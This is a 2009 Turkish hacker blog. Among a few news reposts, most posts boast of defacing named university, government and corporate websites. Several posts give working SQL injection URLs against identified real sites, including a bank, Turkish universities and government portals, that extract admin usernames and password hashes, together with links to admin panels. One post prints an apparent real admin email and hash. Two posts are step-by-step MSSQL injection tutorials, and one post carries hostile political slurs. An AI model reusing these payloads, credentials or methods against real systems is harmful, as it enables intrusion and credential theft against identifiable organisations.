Çinde Uygur Türklerine Yapılan işkenceler

2009-07-09T15:58:00.000-07:00

Birçok kişinin bildiği bir olaydır bu. 1,3 Milyarlık Nufusu olan Çin Halk Cumhuriyeti yıllardır oradaki bir avuç Uygur Türkleri‘ne yaptığı işkencelerden bıkmamış ve halkınıda onlara karşı kışkırtmıştır.Son olaylar ise iyice işi çığırından çıkarmış ve bir çok Uygur Türkleri devlet ve çin’li insanlar tarafından öldürülmüştür. Hatta öldürülmeye devam ediliyor.Çindeki şuan yaşanan kaoslarda 150 kişinin hayatını kaybettiği ve 800 kişinin ağır yaralı olduğu ifade ediliyor.Tabiki bu sadece medyaya yansıyan daha doğrusu Çin’in devlet adamları tarafından medyaya yansıtılan kısmı.Çindeki bazı kesimler Çin hükümetinin olayları örtpas etmeye çalıştığını ifade ediyor.Çinlilerin ve Çin polisinin işkencelerine maruz kalan oradaki Türk kardeşlerime dualarımızı esirgemiyoruz.Allah yardımcıları olsun.

kaynak:vazgecilmez.org

by TheNeSa

ÖSYM, ÖSS sonuçları için gün verdi

2009-07-09T15:45:00.000-07:00

14 Haziran Pazar günü yapılan Öğrenci Seçme Sınavı sonuçları için geri sayım başladı. ÖSYM tarih verdi..

Öğrenci Seçme ve Yerleştirme Merkezi (ÖSYM) Başkanı Prof. Dr. Ünal Yarımağan, 2009-ÖSS sonuçlarının 12 Temmuz Pazar günü açıklanacağını bildirdi.

Yarımağan, YÖK Genel Kurulunun bugün aldığı ''ÖSS'deki baraj puanlarını geçmeyi kolaylaştırıcı'' yöndeki kararının ÖSS'ye giren 80-100 bin adayı etkileyeceğini söyledi.

Yarımağan, AA muhabirine yaptığı açıklamada, 14 Haziran Pazar günü gerçekleştirilen ÖSS ile 21 Haziran Pazar günü yapılan Yabancı Dil Sınavı (YDS) ile hesaplama çalışmalarının son aşamaya geldiğini bildirdi.

Ünal Yarımağan, YÖK Genel Kurulu'nun bugün aldığı ''Öğrenci sayısındaki azalma, kontenjanlardaki artış ve bazı testlerdeki soruların güçlüğü dikkate alınarak bu yılki sınavda 165 taban puanını yüzde 20 ortalama net başarıya, 145 taban puanını da yüzde 10 ortalama net başarıya eşleştiren bir düzenleme yapıldığı'' yönündeki kararla ilgili öneriyi ÖSYM olarak kendilerinin YÖK'e sunduğunu ifade etti.

''Bu karar doğrultusunda puanlar yeniden mi hesaplanacak?'' sorusuna Yarımağan, ''Biz puanların buna uyarlanmasını yaptık bile. Bu kısa bir iş. Zaten biz bu kararı YÖK Genel Kurulundan bekliyorduk. Çünkü öneri bizim. Birkaç seçenek sunmuştuk, YÖK de bu kararı aldı. Bu, barajın geçen öğrenci sayısının artırılması anlamında. Çalışmalarımızı yaptık, sınav sonuçlarını pazar günü açıklayacağız'' yanıtını verdi.

''SORULAR ZOR OLMUŞ, KONTENJANLARDA ÇOK BOŞLUK KALABİLİRDİ''

Bu kararın kaç adayın barajı geçmesine imkan sağladığı yönündeki soru üzerine Yarımağan, şöyle konuştu:

''ÖSS'ye başvuran öğrenci sayısı geçen yıla göre 195 bin, sınava giren öğrenci sayısı 180 bin azaldı. Örgün öğretimdeki kontenjanlar da 90 bin civarında arttı. Bunun yanı sıra birkaç testte de sorular biraz zor olmuş. Sorular mesela, Türkçe testinde geçen yıla göre zormuş. Bütün bunlar bir araya geldiğinde kontenjanlarda çok boşluk kalabilirdi. Bu nedenle böyle bir karara gerek duyuldu. Bu karar, 80-100 bin öğrenciyi etkiler.''

Prof. Dr. Ünal Yarımağan, şu anda detaylar üzerinde çalışmaların devam ettiğini belirterek, ''Birkaç gündür bu kararı bekliyorduk. Bunlar programlı şeyler'' dedi.

kaynak: haber7

by TheNeSa

Firefox 3.5'da hayal kırıklığı!

2009-07-09T15:38:00.000-07:00

Mozilla, Firefox 3.5'u tamirhaneye çekti.

Şirketin yaptığı açıklamaya göre; bir çok hatasından dolayı, Firefox 3.5 tamire alındı. Kullanıcıların hatalardan rahatsızlık duymaması istendiği için çalışmalar tam gaz devam ediyor.

Sık sık tekrarlanan hatalardan arındırılmış Firefox 3.5.1 versiyonunu, Mozilla Temmuz’un ortalarında piyasaya çıkarmayı hedefliyor. Birçok uygulama gibi, Firefox da hataların kaynağını anlamak için kullanıcıların desteğini bekliyor. Sistem çöktüğünde, raporlama yöntemi ile bilgiler, tek bir merkezde toplanabilir.

Hatalardan her birinin tamiri için Firefox 3.5’da ilk defa kullanılan, daha yeni ve daha hızlı bir JavaScript motoru olan TraceMonkey programı şart görünüyor. En son ortaya çıkan sorunlar, yeni sürüm piyasaya sürülmeden önce giderilmişti.

Bu durum tabii ki Mozilla için pek de alışılmışın dışında değil. Daha geçen yıl Firefox 3.0’ı piyasaya sunduktan 4 hafta sonra şirket, benzer problemlerden ötürü aynı şekilde Firefox 3.0.1’i piyasaya çıkartmıştı.

Mozilla’nın yaptığı sayımlara göre, Firefox 3.5 çıktıktan sonraki ilk 36 saat içinde yaklaşık 6.5 milyon kez indirildi. Tabii ki bu rakam ilk 24 saatte 8,3 milyon defa indirilen Firefox 3.0 sürümünün önüne geçemiyor. Buna karşın; Apple’ın Safari programının ilk 3 gününde 11 milyon defa indirilmesi ile karşılaştırılacak olursa, muhteşem bir rakam.

Firefox 3.5 sürümü; Windows, Mac, Linux programlarında 58 farklı dilde kullanılabiliyor. Mozilla’nın resmi sitesinde, yardım (Help) menüsünün altında ki “Güncellemeler için kontrol et (Check for Updates)”i seçerek gerekli güncellemeleri yapabilirsiniz.

kaynak: pcworld

by TheNeSa

www.bartin.edu.tr Hacked

2009-07-09T03:17:00.000-07:00

site:

www.bartin.edu.tr

mirr0r:

http://zone-h.org/mirror/id/9060511

not sisteminede girdim :D isteye düzeltebilirim :D

by TheNeSa

www.dtp.pl SQL

2009-07-08T15:20:00.000-07:00

Site:

http://www.dtp.pl

Sql:

http://www.dtp.pl/noweprodukty/index.asp?id=185
+union+select+0,password,2+from+users

Panel:

http://www.dtp.pl/admin

yalnız panel şifrelenmiş geçmedim :S

by TheNeSa

www.ksm.gov.tr SQL

2009-07-08T15:12:00.000-07:00

Site:

www.ksm.gov.tr

Sql:

http://www.ksm.gov.tr/ilan.asp?id=169+
union+select+0,user,2,3,4+from+users

by TheNeSa

www.milliparklar.gov.tr SQL

2009-07-08T15:09:00.000-07:00

Site:
http://www.milliparklar.gov.tr

Sql:

http://www.milliparklar.gov.tr/Ayrinti_ayhd.asp?haber_id=187+
union+select+0,1,2,3,4,5,6,7,8+from+admin

by TheNeSa

S.a arkadaşlar uzun süredir giremiyom

2009-07-03T06:42:00.000-07:00

arkdaşlar lise 4'e geçtim ve öss var biizmkiler ders çaloışmadığım için neti kapadı bu sebeple giremiyom burada yorum bırakırdanız gerekli cevapları girdiğimde veririm yardımcı oluyorum saten görüyosunuz elimden geldiğince çok güsel siteler var ama zaman yok bu arada nic.pr yede girdim :D her an dns deiştirip bikaç domain hack'e hazır :D benzer süper siteler var yakında görürsünüs saten :D nese kibakın görüşürüz bu gün burdayım azcık :D

by TheNeSa

Pr 5 olmuşum :D

2009-06-24T10:44:00.000-07:00

pagerank gücenllemesi geldi bide baktım

pr 5 olmuşum hade hayırlısı :D

by TheNeSa

Çukurova Üniversitesi Fizik Bölümü - fizik.cu.edu.tr Hacked !

2009-06-19T09:34:00.000-07:00

Site:

http://fizik.cu.edu.tr

Mirr0r:

http://zone-h.org/mirror/id/9009398

by TheNeSa

www.Nic.ba SQL

2009-06-19T05:11:00.000-07:00

Site:

http://www.nic.ba

SQL

http://www.nic.ba/stream/press/index.php?sta=3&pid=113
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25

version 4 tablo tahmin etmek gerekiyo.
tablo bulan basar google'a microsofta

http://www.nic.ba/stream/press/index.php?sta=3&pid=113
%20and%201=2%20union%20select%201,unhex(hex(@@version))
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25

buda panel :

http://www.nic.ba/stream/adminlogin/

by TheNeSa

MSSQL Union Kullanımı

2009-06-18T03:17:00.000-07:00

mysql de access te herkes union kullanır ama mssql
genelde kullanılmas ve etrafta tek döküman
yok bunun için bende böle bi döküman hazırladım
inş anlatabilmişimdir.

Önce order by ile column sayısını alalım.

http://www.thenesa.com/nesa.asp?id=1 order by 1--

http://www.thenesa.com/nesa.asp?id=1 order by 2--

http://www.thenesa.com/nesa.asp?id=1 order by 3--

http://www.thenesa.com/nesa.asp?id=1 order by 4--

v.s column u eşitledik 4 olsun.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,4--

şimdi versionu alalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,@@version--

ve şimdi de unionla informaion shemadan veri çekelim.

bunu sysobject'den veri almak içinde kullanbilirsiniz bu

size kalmış.

Şimdi Tablo Alalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,table_name from information_schema.tables--

Bir tablo alırız. Aldığımız tablo admin olsun

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,table_name from information_schema.tables
where table_name not in ('admin')--

Bu şekilde admin’den sonraki tabloyu alırız.ve soraki tablo

nesa olsun.nesa’dan soraki tabloyuda bu şekilde alıyoruz.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,table_name from information_schema.tables where
table_name not in ('admin','nesa')--

ve ondan soraki tablo...

Column alalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 11,22,33,column_name from information_schema.columns
where table_name='admin'--

admin tablosunun ilk Column’unu verir. Ilk column id olsun.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,column_name from information_schema.columns where
table_name='admin' and column_name not in ('id')--

id den soraki column.Aldığımız column username olsun.

Soraki column’u alalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,column_name from information_schema.columns
where table_name='admin' and column_name not in ('id','username')--

bu şekilde.

Şimdide union la veri okuyalım.

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,username from admin--

aldığımız username admin olsun. adminden soraki username almak için

http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,username from admin where username not in ('admin')--

işte bu şekilde...

by TheNeSa

MSSQL’de information_Schema Tablo Column alımı

2009-06-17T11:50:00.000-07:00

Tablo alalım.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables))—

Bir tablo alırız. Aldığımız tablo admin olsun

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables
+where+table_name+not+in+(‘admin')))--

Bu şekilde admin’den sonraki tabloyu alırız.ve soraki tablo
nesa olsun.nesa’dan soraki tabloyuda bu şekilde alıyoruz.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables
+where+table_name+not+in+('admin','nesa')))--

Column Alalım.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'))--

admin tablosunun ilk Column’unu verir. Ilk column id olsun.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'+and+column_name+
not+in+('id')))—

Id’den sonraki column’u aldık. Aldığımız column username olsun.
Soraki column’u alalım.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'+and+column_name
+not+in+('id','username')))--

bu şekilde soraki column’uda alırıs.

Bide burda veri okuyalım.

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+username+from+admin))--

aldığımız username admin olsun soraki

username için yine not in kullancas

http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+username+from+admin
+where+username+not+in+('admin')))--

fazla uzatmaya gerek yok bu şekilde işte :D

Unitybank SQL alın size bide Banka :D

2009-06-17T11:44:00.000-07:00

Site:

http://www.unitybank.com/

SQL:

http://www.unitybank.com/careers.asp?ntype=-99993+union+select+
0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+tbladmin--

bi bankamız eksikti :D

by TheNeSa

Zekeriyabeyaz.com.tr SQL

2009-06-17T11:41:00.000-07:00

Site:

http://zekeriyabeyaz.com.tr

SQL:

http://zekeriyabeyaz.com.tr/video_izle.asp?id=12+union+select+
0,password,2,3,4,username,6+from+tblconfiguration

çok önceden bulmuştum arşivde gördüm siteye koyim
dedim belki panel bulupta çakan olur :D

by TheNeSa

www.fashiontv.com.tr Hacked !

2009-06-15T11:00:00.000-07:00

site:

www.fashiontv.com.tr

mirr0r:

http://zone-h.org/mirror/id/9001970

by TheNeSa

www.un.org.mv SQL

2009-06-14T13:33:00.000-07:00

site:

www.un.org.mv

SQL

http://www.un.org.mv/v2/?lid=15&nid=33 and 1=2+union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+users--

isteyen bassın ;)

by TheNeSa

www.lada.gr Hacked !

2009-06-14T11:28:00.000-07:00

site:

www.lada.gr

mirr0r:

http://turk-h.org/defacement/view/326053/lada.gr/_en/
http://mirror-h.com/bak.php/?id=65707
http://turkey-h.org/defacements/?id=58215

by TheNeSa

www.bmw.com.tw Hacked !

2009-06-14T04:29:00.000-07:00

Site:

www.bmw.com.tw

mirr0r:

http://www.turk-h.org/defacement/view/326027/bmw.com.tw/bmwclub2/
http://www.turkey-h.org/defacements/?id=58060
http://mirror-h.com/bak.php/?id=65622

by TheNeSa

www.uncapsa.org Hacked !

2009-06-14T03:46:00.000-07:00

site:

http://www.uncapsa.org/

http://www.uncapsa.org/Palawija_Detail.asp?VJournalKey=776

mir0r:

http://turkey-h.org/defacements/?id=58049

by TheNeSa

www.microsoftgov.co.kr Hacked

2009-06-13T16:01:00.000-07:00

site:

www.microsoftgov.co.kr

mirr0r:

http://zone-h.org/mirror/id/8992543
http://turk-h.org/defacement/view/326017/microsoftgov.co.kr/album/
http://mirror-h.com/bak.php/?id=65612
http://turkey-h.org/defacements/?id=57945
http://www.cyber-mirror.org/Mirror/81413/microsoftgov.co.kr/album/albummain.asp
http://z0ne-h.org/mirror-h/izle.php/?id=836&http://www.microsoftgov.co.kr/album/AlbumMain...

by TheNeSa

microsoft.co.kr Hacked !

2009-06-13T15:47:00.000-07:00

site:http://partner.microsoft.co.kr

mirr0rlar:

http://turk-h.org/defacement/view/326016/partner.microsoft.co.kr/a..
http://mirror-h.com/bak.php/?id=65611
http://turkey-h.org/defacements/?id=57942
http://www.cyber-mirror.org/Mirror/81411/partner.microsoft.co.kr/album/albummain.asp

by TheNeSa

www.odu.edu.tr SQL

2009-06-13T05:57:00.000-07:00

http://www.odu.edu.tr/

SQL:

http://www.odu.edu.tr/IdariBirim/tr/sayfa.php?birimid=11
&id=43+AND+1=2+UNION+SELECT+0,1,
group_concat(id,0x3a,username,0x3a
,password),3,4,5,6+FROM+b_yonetici--

by TheNeSa - Thx: DraKuLa

www.kku.edu.tr SQL

2009-06-13T05:20:00.000-07:00

site:

http://www.kku.edu.tr

SQL:

http://www.kku.edu.tr/fen_edebiyat/detay.php?git=
badalbas&id=58%20and%201=2+union%20select%201,
group_concat(id,0x3a,
username,0x3a,passwd),3+from+manager

md5 kırımadım :S

by TheNeSa

www.ce.yildiz.edu.tr SQL

2009-06-13T04:13:00.000-07:00

site:

www.ce.yildiz.edu.tr

SQL:

http://www.ce.yildiz.edu.tr/myindex.php?id=3 and 1=2 union select 1,2,3,4--

version 4 tablo kolon uğraşamıyom :S

panel:

http://www.ce.yildiz.edu.tr/login.php

www2.bayar.edu.tr SQL

2009-06-13T01:15:00.000-07:00

Site:

www2.bayar.edu.tr

SQL:

http://www2.bayar.edu.tr/duyuru/haber/yazicidostu.php?id=72%20and%201=1+union
+select+0,1,2,3,4,5,6,7,group_concat(username,0x3a,sifre)
,9,10,11,12,13,14,15,16,17,18,19,20,21,23+from+user

http://www2.bayar.edu.tr/duyuru/haber/haber.php?id=316%20and%201=2+union
%20select%201,2,3,4,5,6,7,8,group_concat
(id1,0x3a,username,0x3a,email,0x3a,sifre,0x3a,
aktiv,0x3a,aktson,0x3a),10,11,12,13,14,15,16,17,18
,19,20,21,22,23+from+user--

panel:

http://www2.bayar.edu.tr/duyuru/haber/panel/login.php

by TheNeSa

www.pmyo.sakarya.edu.tr SQL

2009-06-13T01:05:00.000-07:00

Site:

http://www.pmyo.sakarya.edu.tr

SQL:

http://www.pmyo.sakarya.edu.tr/haber.php?id=78%20and%201=2+union%20select
%201,group_concat(id,0x3a,username,0x3a,sifre,0x3a,editorluk)
,3,4,5+from+uyeler

Panel:

http://www.pmyo.sakarya.edu.tr/admin/

by TheNeSa

Adım Adım www.istanbul.edu.tr SQL

2009-06-12T23:59:00.000-07:00

Dbler

http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(schema_name),4,5,6+from+
information_schema.schemata

information_schema,dbmbg

Tablolar

http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,
2,group_concat(table_name),4,5,6+from+
information_schema.tables+where+table_schema=
CONCAT(CHAR(100),CHAR(98),CHAR(109),CHAR(98),CHAR(103))

cv,dosya,duyuru,fotokategori,galeri,kategori,makale,personel,slayt,yonetici

Kolonlar

http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(column_name),4,5,6+from+information_schema.columns
+where+table_name=CONCAT(CHAR(121),CHAR(111),CHAR(110),
CHAR(101),CHAR(116),CHAR(105),CHAR(99),CHAR(105))

yoneticino,yoneticimail,yoneticiparola

Ve passlar

http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(yoneticino,0x3a,yoneticimail,0x3a,yoneticiparola),4,5,6+
from+yonetici

1:molbigen@istanbul.edu.tr:uthgnbkfhr2809546722i3ea

by TheNeSa

www.xoybun.com - www.pdk-xoybun.com Fucked - Fuck Pkk

2009-06-12T14:38:00.000-07:00

www.xoybun.com - www.pdk-xoybun.com - Fucked - Fuck Pkk

site1:www.xoybun.com
site2:www.pdk-xoybun.com

zone1:http://zone-h.org/mirror/id/8982909
zone2:http://zone-h.org/mirror/id/8982905

fuck Pkk

by TheNeSa

http://www.bayrampasa.gov.tr SQL

2009-06-12T07:44:00.000-07:00

http://www.bayrampasa.gov.tr/modules.php?name
=Sections&op=printpage&artid=9999999+union+select
+group_concat(uid,0x3a,uname,0x3a,pass),
1+from+nuke_users

panel:http://www.bayrampasa.gov.tr/admin/

burda bi yerlede bakmadım :S

by TheNeSa